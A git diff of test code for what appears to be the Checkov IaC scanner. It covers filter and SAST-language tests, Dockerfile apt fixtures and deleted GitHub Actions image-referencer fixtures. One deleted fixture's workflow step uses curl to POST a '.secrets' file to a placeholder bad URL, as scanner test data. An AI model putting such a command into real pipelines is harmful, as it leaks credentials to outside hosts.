+    def test_should_skip_if_filtered_policy_is_also_policy_exception(self):
+        instance = RunnerFilter(checks=['CKV_AWS_789'], include_all_checkov_policies=False,
+                                filtered_policy_ids=['CKV_AWS_789'], filtered_exception_policy_ids=['CKV_AWS_789'])
+        self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789'))
+
     def test_should_run_check_enforcement_rules(self):
         instance = RunnerFilter(include_all_checkov_policies=True,
                                 filtered_policy_ids=[], use_enforcement_rules=True)
@@ -723,6 +743,8 @@ def test_apply_enforcement_rules(self):
             'sast_python': Severities[BcSeverities.OFF],
             'sast_java': Severities[BcSeverities.OFF],
             'sast_javascript': Severities[BcSeverities.OFF],
+            'sast_typescript': Severities[BcSeverities.OFF],
+            'sast_golang': Severities[BcSeverities.OFF],
         }
         self.assertEqual(instance.enforcement_rule_configs, expected)
 
@@ -824,8 +846,12 @@ def test_get_sast_languages(self):
         assert SastLanguages.PYTHON in sast_langs
         assert SastLanguages.JAVA in sast_langs
         assert SastLanguages.JAVASCRIPT in sast_langs
-        sast_langs = RunnerFilter.get_sast_languages(['sast_python'], [])
+        assert SastLanguages.TYPESCRIPT in sast_langs
+        assert SastLanguages.GOLANG in sast_langs
+        sast_langs = RunnerFilter.get_sast_languages(['sast_python', 'sast_typescript', 'sast_golang'], [])
         assert SastLanguages.PYTHON in sast_langs
+        assert SastLanguages.TYPESCRIPT in sast_langs
+        assert SastLanguages.GOLANG in sast_langs
         sast_langs = RunnerFilter.get_sast_languages(['sast_python', 'sast_javascript'], [])
         assert SastLanguages.PYTHON in sast_langs
         assert SastLanguages.JAVASCRIPT in sast_langs
@@ -837,6 +863,8 @@ def test_get_sast_languages(self):
         assert SastLanguages.JAVA in sast_langs
         assert SastLanguages.PYTHON not in sast_langs
         assert SastLanguages.JAVASCRIPT not in sast_langs
+        assert SastLanguages.TYPESCRIPT in sast_langs
+        assert SastLanguages.GOLANG in sast_langs
 
     def test_scan_secrets_history_limits_to_secrets_framework(self):
         # when
diff --git a/tests/common/utils/test_type_forcers.py b/tests/common/utils/test_type_forcers.py
index 7373d5a728b..672bb656bec 100644
--- a/tests/common/utils/test_type_forcers.py
+++ b/tests/common/utils/test_type_forcers.py
@@ -1,16 +1,22 @@
 import unittest
 
-from checkov.common.util.type_forcers import convert_prisma_policy_filter_to_dict
+from checkov.common.util.type_forcers import convert_prisma_policy_filter_to_params
 
 
 class TestTypeForcers(unittest.TestCase):
     def test_convert_prisma_policy_filter_to_dict(self):
-        self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,F2=B'), {'F1': 'A', 'F2': 'B'})
-        self.assertDictEqual(convert_prisma_policy_filter_to_dict(''), {})
-        self.assertDictEqual(convert_prisma_policy_filter_to_dict(None), {})
-        self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1 =   A,   F2= B '), {'F1': 'A', 'F2': 'B'})
-        self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,B,F2=C'), {'F1': 'A'})
-        self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,F2=B,C'), {'F1': 'A', 'F2': 'B'})
+        self.assertListEqual(convert_prisma_policy_filter_to_params('F1=A,F2=B'), [('F1', 'A'), ('F2', 'B')])
+        self.assertListEqual(convert_prisma_policy_filter_to_params(''), [])
+        self.assertListEqual(convert_prisma_policy_filter_to_params(None), [])
+        self.assertListEqual(convert_prisma_policy_filter_to_params('F1 =   A,   F2= B '), [('F1', 'A'), ('F2', 'B')])
+        self.assertListEqual(convert_prisma_policy_filter_to_params('F1=A,B,F2=C'), [('F1', 'A'), ('F2', 'C')])
+        self.assertListEqual(convert_prisma_policy_filter_to_params('F1=A,F2=B,C'), [('F1', 'A'), ('F2', 'B')])
+        self.assertListEqual(convert_prisma_policy_filter_to_params('F1=A,F2=B,F1=C'), [('F1', 'A'), ('F2', 'B'), ('F1', 'C')])
+        self.assertListEqual(convert_prisma_policy_filter_to_params('F1=A,F2=B,F1=C,F1=DDD'), [('F1', 'A'), ('F2', 'B'), ('F1', 'C'), ('F1', 'DDD')])
+
+        policy_string = 'policy.name=AWS S3 bucket ACL grants READ permission to everyone'
+        filter_string = convert_prisma_policy_filter_to_params(policy_string)
+        self.assertListEqual(filter_string, [('policy.name', 'AWS S3 bucket ACL grants READ permission to everyone')])
 
 
 if __name__ == '__main__':
diff --git a/tests/dockerfile/checks/example_RunUsingAPT/failure2/Dockerfile b/tests/dockerfile/checks/example_RunUsingAPT/failure2/Dockerfile
new file mode 100644
index 00000000000..8e4e8aa0fbb
--- /dev/null
+++ b/tests/dockerfile/checks/example_RunUsingAPT/failure2/Dockerfile
@@ -0,0 +1,10 @@
+FROM ubuntu
+
+RUN apt install curl
+RUN apt-get update && \
+    apt-get install --yes --no-install-recommends \
+        git && \
+    apt-get clean autoclean && \
+    apt-get autoremove --yes && \
+    cd /var/lib && \
+    rm -rf apt dpkg cache log
\ No newline at end of file
diff --git a/tests/dockerfile/checks/example_RunUsingAPT/failure3/Dockerfile b/tests/dockerfile/checks/example_RunUsingAPT/failure3/Dockerfile
new file mode 100644
index 00000000000..08ec21f79ef
--- /dev/null
+++ b/tests/dockerfile/checks/example_RunUsingAPT/failure3/Dockerfile
@@ -0,0 +1,9 @@
+FROM ubuntu
+
+RUN apt update && \
+    apt-get install --yes --no-install-recommends \
+        git && \
+    apt-get clean autoclean && \
+    apt-get autoremove --yes && \
+    cd /var/lib && \
+    rm -rf apt dpkg cache log
\ No newline at end of file
diff --git a/tests/dockerfile/checks/example_RunUsingAPT/success2/Dockerfile b/tests/dockerfile/checks/example_RunUsingAPT/success2/Dockerfile
new file mode 100644
index 00000000000..e209fd3b277
--- /dev/null
+++ b/tests/dockerfile/checks/example_RunUsingAPT/success2/Dockerfile
@@ -0,0 +1,9 @@
+FROM ubuntu
+
+RUN apt-get update && \
+    apt-get install --yes --no-install-recommends \
+        git && \
+    apt-get clean autoclean && \
+    apt-get autoremove --yes && \
+    cd /var/lib && \
+    rm -rf apt dpkg cache log
\ No newline at end of file
diff --git a/tests/dockerfile/checks/example_RunUsingAPT/success3/Dockerfile b/tests/dockerfile/checks/example_RunUsingAPT/success3/Dockerfile
new file mode 100644
index 00000000000..5c95faf3046
--- /dev/null
+++ b/tests/dockerfile/checks/example_RunUsingAPT/success3/Dockerfile
@@ -0,0 +1,5 @@
+FROM cypress/included:13.6.1
+RUN apt-get update -qq && apt-get install -y gnupg curl && \
+    echo "deb [signed-by=/usr/share/keyrings/cloud.google.gpg] https://packages.cloud.google.com/apt cloud-sdk main" | tee -a /etc/apt/sources.list.d/google-cloud-sdk.list && \
+    curl -sf https://packages.cloud.google.com/apt/doc/apt-key.gpg | apt-key --keyring /usr/share/keyrings/cloud.google.gpg add - && \
+    apt-get update && apt-get install -y google-cloud-sdk kubectl google-cloud-sdk-gke-gcloud-auth-plugin && apt-get clean
\ No newline at end of file
diff --git a/tests/dockerfile/checks/test_RunUsingAPT.py b/tests/dockerfile/checks/test_RunUsingAPT.py
index 71709dea40e..e29de7c6560 100644
--- a/tests/dockerfile/checks/test_RunUsingAPT.py
+++ b/tests/dockerfile/checks/test_RunUsingAPT.py
@@ -15,14 +15,22 @@ def test(self):
         report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
         summary = report.get_summary()
 
-        passing_resources = {"/success/Dockerfile."}
-        failing_resources = {"/failure/Dockerfile.RUN"}
+        passing_resources = {
+            "/success/Dockerfile.",
+            "/success2/Dockerfile.",
+            "/success3/Dockerfile.",
+        }
+        failing_resources = {
+            "/failure/Dockerfile.RUN",
+            "/failure2/Dockerfile.RUN",
+            "/failure3/Dockerfile.RUN",
+        }
 
         passed_check_resources = set([c.resource for c in report.passed_checks])
         failed_check_resources = set([c.resource for c in report.failed_checks])
 
-        self.assertEqual(summary["passed"], 1)
-        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
         self.assertEqual(summary["skipped"], 0)
         self.assertEqual(summary["parsing_errors"], 0)
 
diff --git a/tests/github_actions/image_referencer/__init__.py b/tests/github_actions/image_referencer/__init__.py
deleted file mode 100644
index e69de29bb2d..00000000000
diff --git a/tests/github_actions/image_referencer/conftest.py b/tests/github_actions/image_referencer/conftest.py
deleted file mode 100644
index 1357f974587..00000000000
--- a/tests/github_actions/image_referencer/conftest.py
+++ /dev/null
@@ -1,522 +0,0 @@
-from __future__ import annotations
-from typing import Any
-
-import pytest
-
-
-@pytest.fixture
-def workflow_with_images() -> dict[str, Any]:
-    return {
-        "name": "Name",
-        "on": {
-            "workflow_dispatch": {
-                "inputs": {
-                    "logLevel": {
-                        "description": "Log level",
-                        "__startline__": 6,
-                        "__endline__": 8
-                    },
-                    "__startline__": 5,
-                    "__endline__": 8
-                },
-                "__startline__": 4,
-                "__endline__": 8
-            },
-            "__startline__": 3,
-            "__endline__": 8
-        },
-        "jobs": {
-            "destroy_cert": {
-                "runs-on": "ubuntu-latest",
-                "name": "Name",
-                "container": "node:14.16",
-                "steps": [
-                    {
-                        "name": "Checkout codebase",
-                        "uses": "actions/checkout@v3",
-                        "__startline__": 14,
-                        "__endline__": 16
-                    },
-                    {
-                        "name": "infrastructure",
-                        "working-directory": "terraform",
-                        "shell": "bash",
-                        "env": {
-                            "TF_INPUT": 0,
-                            "__startline__": 20,
-                            "__endline__": 21
-                        },
-                        "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n",
-                        "__startline__": 16,
-                        "__endline__": 24
-                    }
-                ],
-                "__startline__": 10,
-                "__endline__": 24
-            },
-            "__startline__": 9,
-            "__endline__": 24
-        },
-        "__startline__": 1,
-        "__endline__": 24
-    }
-
-
-@pytest.fixture
-def workflow_line_numbers_with_image() -> list[tuple[int, str]]:
-    return [(1, 'name: Name\n'),
-            (2, 'on:\n'),
-            (3, '  workflow_dispatch:\n'),
-            (4, '    inputs:\n'),
-            (5, '      logLevel:\n'),
-            (6, "        description: 'Log level'\n"),
-            (7, '\n'),
-            (8, 'jobs:\n'),
-            (9, '  destroy_cert:\n'),
-            (10, '    runs-on: ubuntu-latest\n'),
-            (11, '    name: Name\n'),
-            (12, '    container: node:14.16\n'),
-            (13, '    steps:\n'),
-            (14, '      - name: Checkout codebase\n'),
-            (15, '        uses: actions/checkout@v3\n'),
-            (16, '      - name: infrastructure\n'),
-            (17, '        working-directory: terraform\n'),
-            (18, '        shell: bash\n'),
-            (19, '        env:\n'),
-            (20, '          TF_INPUT: 0\n'),
-            (21, '        run: |\n'),
-            (22, '          terragrunt init\n'),
-            (23, '          terragrunt destroy -auto-approve -var-file devl.tfvars\n')]
-
-
-@pytest.fixture
-def workflow_without_images() -> dict[str, Any]:
-    return {
-        "on": "pull_request",
-        "name": "unsecure-worfklow",
-        "jobs": {
-            "unsecure-job": {
-                "name": "job2",
-                "runs-on": "ubuntu-latest",
-                "env": {
-                    "ACTIONS_ALLOW_UNSECURE_COMMANDS": True,
-                    "__startline__": 10,
-                    "__endline__": 11
-                },
-                "steps": [
-                    {
-                        "name": "unsecure-step2",
-                        "run": "echo \"goo\"\n",
-                        "__startline__": 12,
-                        "__endline__": 15
-                    }
-                ],
-                "__startline__": 7,
-                "__endline__": 15
-            },
-            "secure-job": {
-                "name": "job3",
-                "runs-on": "ubuntu-latest",
-                "env": {
-                    "ACTIONS_ALLOW_UNSECURE_COMMANDS": False,
-                    "__startline__": 19,
-                    "__endline__": 20
-                },
-                "run": "echo \"ok\"",
-                "__startline__": 16,
-                "__endline__": 21
-            },
-            "__startline__": 6,
-            "__endline__": 21
-        },
-        "__startline__": 1,
-        "__endline__": 21
-    }
-
-
-@pytest.fixture
-def workflow_line_numbers_with_image_first() -> list[tuple[int, str]]:
-    return [(1, 'name: Name\n'),
-            (2, 'on:\n'),
-            (3, '  workflow_dispatch:\n'),
-            (4, '    inputs:\n'),
-            (5, '      logLevel:\n'),
-            (6, "        description: 'Log level'\n"),
-            (7, '\n'),
-            (8, 'jobs:\n'),
-            (9, '  first_job:\n'),
-            (10, '    container: node:14.22\n'),
-            (11, '    name: Name\n'),
-            (12, '    book: wood\n'),
-            (13, '    steps:\n'),
-            (14, '      - name: Checkout codebase\n'),
-            (15, '        uses: actions/checkout@v3\n'),
-            (16, '      - name: infrastructure\n'),
-            (17, '        working-directory: terraform\n'),
-            (18, '        shell: bash\n'),
-            (19, '        env:\n'),
-            (20, '          TF_INPUT: 0\n'),
-            (21, '        run: |\n'),
-            (22, '          terragrunt init\n'),
-            (23, '          terragrunt destroy -auto-approve -var-file devl.tfvars\n'),
-            (24, '  second_job:\n'),
-            (25, '    runs-on: ubuntu-latest\n'),
-            (26, '    name: Name\n'),
-            (27, '    container: node:14.16\n'),
-            (28, '    steps:\n'),
-            (29, '      - name: Checkout codebase\n'),
-            (30, '        uses: actions/checkout@v3\n'),
-            (31, '      - name: infrastructure\n'),
-            (32, '        working-directory: terraform\n'),
-            (33, '        shell: bash\n'),
-            (34, '        env:\n'),
-            (35, '          TF_INPUT: 0\n'),
-            (36, '        run: |\n'),
-            (37, '          terragrunt init\n'),
-            (38, '          terragrunt destroy -auto-approve -var-file devl.tfvars\n')
-            ]
-
-
-@pytest.fixture
-def workflow_line_numbers_with_two_identical_images() -> list[tuple[int, str]]:
-    return [(1, 'name: Name\n'),
-            (2, 'on:\n'),
-            (3, '  workflow_dispatch:\n'),
-            (4, '    inputs:\n'),
-            (5, '      logLevel:\n'),
-            (6, "        description: 'Log level'\n"),
-            (7, '\n'),
-            (8, 'jobs:\n'),
-            (9, '  first_job:\n'),
-            (10, '    runs-on: ubuntu-latest\n'),
-            (11, '    name: Name\n'),
-            (12, '    container: node:14.16\n'),
-            (13, '    steps:\n'),
-            (14, '      - name: Checkout codebase\n'),
-            (15, '        uses: actions/checkout@v3\n'),
-            (16, '      - name: infrastructure\n'),
-            (17, '        working-directory: terraform\n'),
-            (18, '        shell: bash\n'),
-            (19, '        env:\n'),
-            (20, '          TF_INPUT: 0\n'),
-            (21, '        run: |\n'),
-            (22, '          terragrunt init\n'),
-            (23, '          terragrunt destroy -auto-approve -var-file devl.tfvars\n'),
-            (24, '  second_job:\n'),
-            (25, '    runs-on: ubuntu-latest\n'),
-            (26, '    name: Name\n'),
-            (27, '    container: node:14.16\n'),
-            (28, '    steps:\n'),
-            (29, '      - name: Checkout codebase\n'),
-            (30, '        uses: actions/checkout@v3\n'),
-            (31, '      - name: infrastructure\n'),
-            (32, '        working-directory: terraform\n'),
-            (33, '        shell: bash\n'),
-            (34, '        env:\n'),
-            (35, '          TF_INPUT: 0\n'),
-            (36, '        run: |\n'),
-            (37, '          terragrunt init\n'),
-            (38, '          terragrunt destroy -auto-approve -var-file devl.tfvars\n')
-            ]
-
-
-@pytest.fixture
-def workflow_with_image_first() -> dict[str, Any]:
-    return {
-        "name": "Name",
-        "on": {
-            "workflow_dispatch": {
-                "inputs": {
-                    "logLevel": {
-                        "description": "Log level",
-                        "__startline__": 6,
-                        "__endline__": 8
-                    },
-                    "__startline__": 5,
-                    "__endline__": 8
-                },
-                "__startline__": 4,
-                "__endline__": 8
-            },
-            "__startline__": 3,
-            "__endline__": 8
-        },
-        "jobs": {
-            "first_job": {
-                "runs-on": "ubuntu-latest",
-                "name": "Name",
-                "container": "node:14.22",
-                "steps": [
-                    {
-                        "name": "Checkout codebase",
-                        "uses": "actions/checkout@v3",
-                        "__startline__": 14,
-                        "__endline__": 16
-                    },
-                    {
-                        "name": "infrastructure",
-                        "working-directory": "terraform",
-                        "shell": "bash",
-                        "env": {
-                            "TF_INPUT": 0,
-                            "__startline__": 20,
-                            "__endline__": 21
-                        },
-                        "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n",
-                        "__startline__": 16,
-                        "__endline__": 24
-                    }
-                ],
-                "__startline__": 10,
-                "__endline__": 24
-            },
-            "second_job": {
-                "runs-on": "ubuntu-latest",
-                "name": "Name",
-                "container": "node:14.16",
-                "steps": [
-                    {
-                        "name": "Checkout codebase",
-                        "uses": "actions/checkout@v3",
-                        "__startline__": 29,
-                        "__endline__": 31
-                    },
-                    {
-                        "name": "infrastructure",
-                        "working-directory": "terraform",
-                        "shell": "bash",
-                        "env": {
-                            "TF_INPUT": 0,
-                            "__startline__": 35,
-                            "__endline__": 36
-                        },
-                        "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n",
-                        "__startline__": 31,
-                        "__endline__": 39
-                    }
-                ],
-                "__startline__": 25,
-                "__endline__": 39
-            },
-            "__startline__": 24,
-            "__endline__": 39
-        },
-        "__startline__": 1,
-        "__endline__": 39
-    }
-
-
-@pytest.fixture
-def workflow_with_two_identical_images() -> dict[str, Any]:
-    return {
-        "name": "Name",
-        "on": {
-            "workflow_dispatch": {
-                "inputs": {
-                    "logLevel": {
-                        "description": "Log level",
-                        "__startline__": 6,
-                        "__endline__": 8
-                    },
-                    "__startline__": 5,
-                    "__endline__": 8
-                },
-                "__startline__": 4,
-                "__endline__": 8
-            },
-            "__startline__": 3,
-            "__endline__": 8
-        },
-        "jobs": {
-            "first_job": {
-                "runs-on": "ubuntu-latest",
-                "name": "Name",
-                "container": "node:14.16",
-                "steps": [
-                    {
-                        "name": "Checkout codebase",
-                        "uses": "actions/checkout@v3",
-                        "__startline__": 14,
-                        "__endline__": 16
-                    },
-                    {
-                        "name": "infrastructure",
-                        "working-directory": "terraform",
-                        "shell": "bash",
-                        "env": {
-                            "TF_INPUT": 0,
-                            "__startline__": 20,
-                            "__endline__": 21
-                        },
-                        "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n",
-                        "__startline__": 16,
-                        "__endline__": 24
-                    }
-                ],
-                "__startline__": 10,
-                "__endline__": 24
-            },
-            "second_job": {
-                "runs-on": "ubuntu-latest",
-                "name": "Name",
-                "container": "node:14.16",
-                "steps": [
-                    {
-                        "name": "Checkout codebase",
-                        "uses": "actions/checkout@v3",
-                        "__startline__": 29,
-                        "__endline__": 31
-                    },
-                    {
-                        "name": "infrastructure",
-                        "working-directory": "terraform",
-                        "shell": "bash",
-                        "env": {
-                            "TF_INPUT": 0,
-                            "__startline__": 35,
-                            "__endline__": 36
-                        },
-                        "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n",
-                        "__startline__": 31,
-                        "__endline__": 39
-                    }
-                ],
-                "__startline__": 25,
-                "__endline__": 39
-            },
-            "__startline__": 24,
-            "__endline__": 39
-        },
-        "__startline__": 1,
-        "__endline__": 39
-    }
-
-
-@pytest.fixture
-def workflow_line_numbers_without_image() -> list[tuple[int, str]]:
-    return [(1, 'on: pull_request\n'),
-            (2, '\n'),
-            (3, 'name: unsecure-worfklow\n'),
-            (4, '\n'),
-            (5, 'jobs:\n'),
-            (6, '  unsecure-job:\n'),
-            (7, '    name: job2\n'),
-            (8, '    runs-on: ubuntu-latest\n'),
-            (9, '    env:\n'),
-            (10, '      ACTIONS_ALLOW_UNSECURE_COMMANDS: true\n'),
-            (11, '    steps:\n'),
-            (12, '      - name: unsecure-step2\n'),
-            (13, '        run: |\n'),
-            (14, '          echo "goo"\n'),
-            (15, '  secure-job:\n'),
-            (16, '    name: job3\n'),
-            (17, '    runs-on: ubuntu-latest\n'),
-            (18, '    env:\n'),
-            (19, '      ACTIONS_ALLOW_UNSECURE_COMMANDS: false\n'),
-            (20, '    run: |\n'),
-            (21, '      echo "ok"')]
-
-
-@pytest.fixture
-def image_cached_result() -> dict[str, Any]:
-    return {
-        "results": [
-            {
-                "id": "sha256:f9b91f78b0344fa0efc5583d79e78a90556ab0bb3f93fcbc8728b0b70d29a5db",
-                "name": "python:3.9-alpine",
-                "distro": "Alpine Linux v3.16",
-                "distroRelease": "3.16.1",
-                "digest": "sha256:83a343afa488ff14d0c807b62770140d2ec30ef2e83a3a45c4ce62c29623e240",
-                "collections": ["All"],
-                "packages": [{"type": "os", "name": "zlib", "version": "1.2.12-r1", "licenses": ["Zlib"]}],
-                "compliances": [],
-                "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0},
-                "complianceScanPassed": True,
-                "vulnerabilities": [
-                    {
-                        "id": "CVE-2022-37434",
-                        "status": "fixed in 1.2.12-r2",
-                        "description": "zlib through 1.2.12 has a heap-based buffer over-read ...",
-                        "severity": "low",
-                        "packageName": "zlib",
-                        "packageVersion": "1.2.12-r1",
-                        "link": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434",
-                        "riskFactors": ["Has fix", "Recent vulnerability"],
-                        "impactedVersions": ["<1.2.12-r2"],
-                        "publishedDate": "2022-08-05T07:15:00Z",
-                        "discoveredDate": "2022-08-08T13:45:43Z",
-                        "fixDate": "2022-08-05T07:15:00Z",
-                    }
-                ],
-                "vulnerabilityDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 1, "total": 1},
-                "vulnerabilityScanPassed": True,
-            }
-        ]
-    }
-
-
-@pytest.fixture
-def definition() -> dict[str, Any]:
-    return {
-        "name": "CI",
-        "on": {
-            "push": {
-                "branches": [
-                    "main"
-                ],
-                "__startline__": 4,
-                "__endline__": 5
-            },
-            "__startline__": 3,
-            "__endline__": 5
-        },
-        "jobs": {
-            "container-test-job": {
-                "runs-on": "ubuntu-latest",
-                "container": {
-                    "image": "node:14.16",
-                    "env": {
-                        "NODE_ENV": "development",
-                        "__startline__": 11,
-                        "__endline__": 12
-                    },
-                    "ports": [
-                        80
-                    ],
-                    "volumes": [
-                        "my_docker_volume:/volume_mount"
-                    ],
-                    "options": "--cpus 1",
-                    "__startline__": 9,
-                    "__endline__": 17
-                },
-                "steps": [
-                    {
-                        "name": "Check for dockerenv file",
-                        "run": "(ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv)\ncurl -X POST -s --data \"@.secrets\" <BADURL > /dev/null\n",
-                        "__startline__": 18,
-                        "__endline__": 23
-                    }
-                ],
-                "__startline__": 7,
-                "__endline__": 23
-            },
-            "second_job": {
-                "runs-on": "ubuntu-latest",
-                "steps": [
-                    {
-                        "name": "Check for dockerenv file",
-                        "run": "(ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv)\ncurl -X POST -s --data \"@.secrets\" <BADURL > /dev/null\n",
-                        "__startline__": 26,
-                        "__endline__": 30
-                    }
-                ],
-                "__startline__": 24,
-                "__endline__": 30
-            },
-            "__startline__": 6,
-            "__endline__": 30
-        },
-        "__startline__": 1,
-        "__endline__": 30
-    }
\ No newline at end of file
diff --git a/tests/github_actions/image_referencer/test_github_action_provider.py b/tests/github_actions/image_referencer/test_github_action_provider.py
deleted file mode 100644
index 5c5f64f6aa6..00000000000
--- a/tests/github_actions/image_referencer/test_github_action_provider.py
+++ /dev/null
@@ -1,95 +0,0 @@
-import pytest
-
-from checkov.common.images.image_referencer import Image
-from checkov.github_actions.image_referencer.provider import GithubActionProvider
-from checkov.github_actions.runner import Runner
-
-def test_extract_images_from_workflow(workflow_with_images, workflow_line_numbers_with_image):
-    file_path = '/.github/workflows/workflow_with_string_container.yml'
-
-    gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_images,
-                                        workflow_line_numbers=workflow_line_numbers_with_image)
-    images = gha_provider.extract_images_from_workflow()
-
-    assert images == [
-        Image(
-            end_line=13,
-            start_line=12,
-            name='node:14.16',
-            file_path=file_path,
-            related_resource_id='jobs(destroy_cert)'
-        )
-    ]
-
-
-def test_extract_images_from_workflow_no_images(workflow_without_images, workflow_line_numbers_without_image):
-    file_path = '/.github/workflows/unsecure_command.yaml'
-
-    gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_without_images,
-                                        workflow_line_numbers=workflow_line_numbers_without_image)
-    images = gha_provider.extract_images_from_workflow()
-
-    assert not images
-
-
-def test_extract_images_from_workflow_with_first_image(workflow_with_image_first, workflow_line_numbers_with_image_first):
-    file_path = '/.github/workflows/command.yaml'
-
-    gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_image_first,
-                                        workflow_line_numbers=workflow_line_numbers_with_image_first)
-    images = gha_provider.extract_images_from_workflow()
-
-    assert len(images) == 2
-    assert images[0].start_line != images[1].start_line
-    assert images[0].end_line != images[1].end_line
-    assert images[0].related_resource_id != images[1].related_resource_id
-
-
-def test_extract_images_from_workflow_correct_line_numbers(workflow_with_two_identical_images,
-                                                           workflow_line_numbers_with_two_identical_images):
-    file_path = '/.github/workflows/unsecure_command.yaml'
-
-    gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_two_identical_images,
-                                        workflow_line_numbers=workflow_line_numbers_with_two_identical_images)
-    images = gha_provider.extract_images_from_workflow()
-
-    assert len(images) == 2
-    assert images[0].start_line != images[1].start_line
-    assert images[0].end_line != images[1].end_line
-    assert images[0].related_resource_id != images[1].related_resource_id
-
-
-@pytest.mark.parametrize(
-    "start_line,end_line,expected_key",
-    [
-        (9, 17, "jobs(container-test-job)"),
-        (24, 30, "jobs(second_job)"),
-        (35, 40, "")
-    ],
-)
-def test_generate_resource_key(start_line, end_line, expected_key, definition):
-    gha_provider = GithubActionProvider(definition, '', [])
-
-    key = gha_provider.generate_resource_key(start_line, end_line)
-
-    assert key == expected_key
-
-
-@pytest.mark.parametrize(
-    "start_line, end_line, supported_entities, old_key_format, expected_key",
-    [
-        (9, 17, ('jobs', 'jobs.*.steps[]'), 'jobs.container-test-job.CKV_GHA_3[7:23]', "jobs(container-test-job)"),
-        (24, 30, ('jobs', 'jobs.*.steps[]'), "jobs.second_job.CKV_GHA_3[24:30]", "jobs(second_job)")
-    ],
-)
-def test_generate_resource_key_generates_same_key_as_get_resource(start_line, end_line, supported_entities,
-                                                                  old_key_format, expected_key, definition):
-    gha_provider = GithubActionProvider(definition, '', [])
-    runner = Runner()
-    file_path = "mock_path"
-    runner.definitions[file_path] = definition
-
-    key1 = runner.get_resource(file_path, old_key_format, supported_entities, start_line, end_line)
-    key2 = gha_provider.generate_resource_key(start_line, end_line)
-
-    assert key1 == key2 == expected_key
diff --git a/tests/github_actions/image_referencer/test_manager.py b/tests/github_actions/image_referencer/test_manager.py
deleted file mode 100644
index 5c8a8350864..00000000000
--- a/tests/github_actions/image_referencer/test_manager.py
+++ /dev/null
@@ -1,30 +0,0 @@
-from checkov.common.images.image_referencer import Image
-from checkov.github_actions.image_referencer.manager import GithubActionsImageReferencerManager
-
-
-def test_extract_images_from_workflow(workflow_with_images, workflow_line_numbers_with_image):
-    file_path = '/.github/workflows/workflow_with_string_container.yml'
-
-    manager = GithubActionsImageReferencerManager(file_path=file_path, workflow_config=workflow_with_images,
-                                                  workflow_line_numbers=workflow_line_numbers_with_image)
-    images = manager.extract_images_from_workflow()
-
-    assert images == [
-        Image(
-            end_line=13,
-            start_line=12,
-            name='node:14.16',
-            file_path=file_path,
-            related_resource_id='jobs(destroy_cert)'
-        )
-    ]
-
-
-def test_extract_images_from_workflow_no_images(workflow_without_images, workflow_line_numbers_without_image):
-    file_path = '/.github/workflows/unsecure_command.yaml'
-
-    manager = GithubActionsImageReferencerManager(file_path=file_path, workflow_config=workflow_without_images,
-                                                  workflow_line_numbers=workflow_line_numbers_without_image)
-    images = manager.extract_images_from_workflow()
-
-    assert not images
diff --git a/tests/github_actions/image_referencer/test_runner.py b/tests/github_actions/image_referencer/test_runner.py
deleted file mode 100644
index d14473b37a0..00000000000
--- a/tests/github_actions/image_referencer/test_runner.py
+++ /dev/null
@@ -1,65 +0,0 @@
-from pathlib import Path
-
-from checkov.common.output.report import CheckType
-
-from checkov.common.bridgecrew.bc_source import get_source_type
-from checkov.github_actions.runner import Runner
-
-from checkov.runner_filter import RunnerFilter
-from pytest_mock import MockerFixture
-
-from tests.common.image_referencer.test_utils import mock_get_license_statuses_async, mock_get_image_cached_result_async
-
-RESOURCES_PATH = Path(__file__).parent.parent / "resources/.github/workflows"
-
-
-def test_github_action_workflow(mocker: MockerFixture):
-    from checkov.common.bridgecrew.platform_integration import bc_integration
-
-    file_name = "workflow_with_string_container.yml"
-    image_name = "node:14.16"
-    image_id = "sha256:2460522297"
-    code_lines = "12-13"
-    image_resource_postfixes = ["go", "openssl", "musl"]
-    test_file = RESOURCES_PATH / file_name
-
-    runner_filter = RunnerFilter(run_image_referencer=True)
-    bc_integration.bc_source = get_source_type("disabled")
-
-    mocker.patch(
-        "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async",
-        side_effect=mock_get_image_cached_result_async,
-    )
-    mocker.patch(
-        "checkov.common.images.image_referencer.get_license_statuses_async",
-        side_effect=mock_get_license_statuses_async,
-    )
-    # 'workflow_with_string_container.yml (node:14.16 lines:12-13 (sha256:f9b91f78b0)).musl'
-    reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)
-
-    assert len(reports) == 2
-
-    gha_report = next(report for report in reports if report.check_type == CheckType.GITHUB_ACTIONS)
-    sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
-
-    assert len(gha_report.resources) == 0
-    assert len(gha_report.passed_checks) == 14
-    assert len(gha_report.failed_checks) == 2
-    assert len(gha_report.skipped_checks) == 0
-    assert len(gha_report.parsing_errors) == 0
-
-    assert len(sca_image_report.resources) == 3
-    assert sca_image_report.resources == {
-        f".github/workflows/{file_name} ({image_name} lines:{code_lines} ({image_id})).{postfix}"
-        for postfix in image_resource_postfixes
-    }
-    assert sca_image_report.image_cached_results[0]["dockerImageName"] == "node:14.16"
-    assert sca_image_report.image_cached_results[0]["packages"] == [
-        {"type": "os", "name": "tzdata", "version": "2021a-1+deb11u5", "licenses": []}
-    ]
-
-    assert len(sca_image_report.passed_checks) == 1
-    assert len(sca_image_report.failed_checks) == 4
-    assert len(sca_image_report.image_cached_results) == 1
